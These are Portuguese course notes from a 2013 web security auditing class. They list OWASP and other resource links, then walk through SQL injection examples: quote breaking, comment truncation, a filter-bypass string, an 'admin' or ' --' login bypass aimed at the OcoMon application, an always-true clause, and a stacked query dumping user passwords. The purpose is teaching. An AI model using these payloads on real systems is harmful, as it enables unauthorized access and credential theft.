Anotaes

Curso Auditoria de Segurana em Aplicaes Web EAD Aula 1 Julho de 2013

Kali Linux
http://www.kali.org/

OWASP Broken Web Applications Project

https://www.owasp.org/index.php/OWASP_Broken_Web_Applications_Project

OWASP - Open Web Application Security Project

https://www.owasp.org/

Projeto OWASP Webgoat

https://www.owasp.org/index.php/Category:OWASP_WebGoat_Project

Protocolo HTTP
http://simplesideias.com.br/entendendo-um-pouco-mais-sobre-o-protocolo-http

OWASP Top 10 Project

https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project

RFC do HTTP 1.1

http://tools.ietf.org/html/rfc2616

O que so cookies
http://www.tecmundo.com.br/web/1069-o-que-sao-cookies-.htm
DNS
http://registro.br/suporte/faq/faq5.html

Mtodos HTTP
http://www.vivaolinux.com.br/artigo/Um-pouco-do-protocolo-HTTP?pagina=4

Curso Teste de Invaso em Redes e Sistemas EAD Clavis

https://www.clavis.com.br/treinamento-ensino-a-distancia-ead/teste-de-invasao-em-redes-e-
sistemas/index.php

AJAX
http://codigofonte.uol.com.br/artigos/o-que-e-o-ajax-e-como-ele-funciona
http://www.metropoledigital.ufrn.br/aulas_avancado/web/disciplinas/desenv_web/aula_20.html

Certificados Digitais
http://www.receita.fazenda.gov.br/Novidades/Informa/DestaqueCertificadoDigital.htm

Ginga
http://www.ginga.org.br/pt-br

Proxy
http://www.tecmundo.com.br/navegador/972-o-que-e-proxy-.htm

tamperdata
http://tamperdata.mozdev.org/

Firebug
http://getfirebug.com/

OWASP Top 10 - 2013

https://www.owasp.org/index.php/Top_10_2013-Top_10
OWASP Top 10 2013 - A1 Injeo
https://www.owasp.org/index.php/Top_10_2013-A1-Injection

SQL Injection
http://wiki.postgresql.org/wiki/Sql_injection

whitelist vs blacklist
http://www.testingsecurity.com/whitelists_vs_blacklists

Wireshark
http://www.wireshark.org/

Session Hijacking - Sequestro de sso

http://searchsoftwarequality.techtarget.com/definition/session-hijacking

Webinar # 16 Ataques de Fora Bruta Clavis

http://www.blog.clavis.com.br/webinar-16-ataques-de-forca-bruta-metodo-dicionario-hibridos-e-
rainbow-tables/

Burp Proxy
http://portswigger.net/burp/proxy.html

Token
http://www.tecmundo.com.br/senha/3077-o-que-e-token-.htm

sqlmap
http://sqlmap.org/

Pgina vulnervel acunetix ASP

http://testasp.vulnweb.com/

Pgina vulnervel acunetix PHP

http://testphp.vulnweb.com/
SQL Injection cheat sheet
http://ha.ckers.org/sqlinjection/

Web Application Firewall

https://www.owasp.org/index.php/Web_Application_Firewall

XKCD
http://xkcd.com/

SEGINFO
http://www.seginfo.com.br/

Tirinha original
http://xkcd.com/327/

O que Hash
http://www.techtudo.com.br/artigos/noticia/2012/07/o-que-e-hash.html

Codebox do Instrutor

Querys SQL
Nome: Rafael

Back End
select id from users where
nome = 'Rafael";

Status: OK!
Nome:D'Avila

Back End
select id from users where
nome = 'D'Avila";

Status: Buscaria por D, porm daria erro porque esperava um ; e veio um A

Nome:D';--Avila

Back End
select id from users where
nome = 'D';--Avila";

No daria erro: caractere ; termina a linha e -- insere um comentrio

Para bypassar casos de truncamento de strings:

seleselectct id from ...

Comando para ser utilizado no OcoMon

admin' or ' --

Identificando Session IDs durante autorizao

GET no portal = mj0qgdngj4ithnvonsrgaekn00
Post de auth = mj0qgdngj4ithnvonsrgaekn00
Depois da auth = mj0qgdngj4ithnvonsrgaekn00

Exemplo de Querys de SQL

select id from usuarios where
nome = '$nome'
and
senha = '$senha';
Nome: Rafael
Senha: abc123

select id from usuarios where

nome = 'Rafael'
and
senha = 'abc123';

Criando uma busca para gerar uma verdade absoluta

select id from usuarios where
nome = 'Rafael'
and
senha = ''or '1=1';

Tentativa de insero de comandos

Nome: Rafael
Senha: ' ; select * from usuarios where '1=1

select id from usuarios where

nome = 'Rafael'
and
senha = ' ' ; select * from usuarios where '1=1';

id nome senha
5 Rafael qwerty
----